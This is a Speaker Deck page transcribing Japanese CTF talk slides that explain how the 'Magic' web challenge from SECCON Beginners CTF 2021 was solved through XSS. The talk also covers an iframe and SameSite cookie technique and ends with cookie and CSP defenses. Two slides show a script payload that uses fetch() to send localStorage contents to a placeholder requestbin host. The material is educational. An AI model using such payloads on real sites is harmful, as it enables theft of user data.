Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

Hi120ki
October 17, 2021
Technology
0
1k

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/

Hi120ki

October 17, 2021
Tweet

More Decks by Hi120ki

See All by Hi120ki
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.4k

Other Decks in Technology

See All in Technology
Oracle Base Database Service 技術詳細
oracle4engineer
PRO
6
57k
SA Night #2 FinatextのSA思想/SA Night #2 Finatext session
satoshiimai
1
140
プロダクトエンジニア構想を立ち上げ、プロダクト志向な組織への成長を続けている話 / grow into a product-oriented organization
hiro_torii
1
220
組織貢献をするフリーランスエンジニアという生き方
n_takehata
2
1.3k
AndroidXR 開発ツールごとの できることできないこと
donabe3
0
130
利用終了したドメイン名の最強終活〜観測環境を育てて、分析・供養している件〜 / The Ultimate End-of-Life Preparation for Discontinued Domain Names
nttcom
2
200
(機械学習システムでも) SLO から始める信頼性構築 - ゆる SRE#9 2025/02/21
daigo0927
0
150
2024.02.19 W&B AIエージェントLT会 / AIエージェントが業務を代行するための計画と実行 / Algomatic 宮脇
smiyawaki0820
14
3.5k
現場の種を事業の芽にする - エンジニア主導のイノベーションを事業戦略に装着する方法 -
kzkmaeda
2
2.1k
リアルタイム分析データベースで実現する SQLベースのオブザーバビリティ
mikimatsumoto
0
1.4k
スタートアップ1人目QAエンジニアが QAチームを立ち上げ、“個”からチーム、 そして“組織”に成長するまで / How to set up QA team at reiwatravel
mii3king
2
1.5k
The Future of SEO: The Impact of AI on Search
badams
0
200

Featured

See All Featured
Reflections from 52 weeks, 52 projects
jeffersonlam
348
20k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.3k
GitHub's CSS Performance
jonrohan
1030
460k
The Cult of Friendly URLs
andyhume
78
6.2k
Documentation Writing (for coders)
carmenintech
67
4.6k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
29
2.4k
GraphQLとの向き合い方2022年版
quramy
44
13k
How To Stay Up To Date on Web Technology
chriscoyier
790
250k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
49
2.3k
Designing for humans not robots
tammielis
250
25k
Building an army of robots
kneath
303
45k
Building Flexible Design Systems
yeseniaperezcruz
328
38k

Transcript

  1. Magic Web SECCON Beginners Live 2021 hi120ki

  2. @hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :

    firmware Web : json, magic

  3. Web Magic 3

  4. Magic [Web Hard] : 31solve Web 5 • • 4

  5. 5 /

  6. 6 /

  7. 7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  8. 8 / URL

  9. 9 /

  10. 10 crawler/index.js puppeteer Node.js Chrome URL

  11. 11 2. FLAG 3. URL crawler/index.js 1.

  12. 12 FLAG nginx/html/static/index.js FLAG

  13. 13 FLAG JavaScript XSS( )

  14. XSS 14 HTML Web HTML JavaScript Cookie Web

  15. 15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG

  16. 16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>

  17. 17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????

  18. 18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL

  19. XSS 19 magic/views/index.ejs <script> </script>

  20. 20 alert(1)

  21. 21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>

  22. 22 FLAG URL

  23. 23 XSS https://magic.quals.beginners.seccon.jp/

  24. 24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS

  25. 25 ... + = ? XSS

  26. 26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG

  27. 27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  28. 28 URL

  29. 29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS

  30. 30 FLAG 1. FLAG 2. 3.

  31. 31

  32. 1. XSS 2. 3. 32

  33. 1. XSS 2. 3. 33 FLAG

  34. 1. XSS 2. 3. 34

  35. 1. XSS 2. 3. 35

  36. 36 FLAG

  37. XSS • • Byte Bandits CTF 2020 Notes App •

    https://github.com/ByteBandits/bbctf-2020 37

  38. Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •

    FLAG iframe • • API

  39. iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL

    iframe

  40. iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe

  41. iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS

    FLAG

  42. iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)

    <script>...</script>

  43. 43 iframe SameSite Cookie None Lax

  44. 44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)

    FLAG

  45. 45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)

    FLAG

  46. SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie

    (session=nj49gn...) ✕ FLAG <script>...</script>

  47. 47 SameSite Cookie=None iframe CTF

  48. 48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (

    XSS Content-Security-Policy )

  49. 49 FLAG +

  50. 50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup

    https://hi120ki.github.io/blog/posts/20210523-3/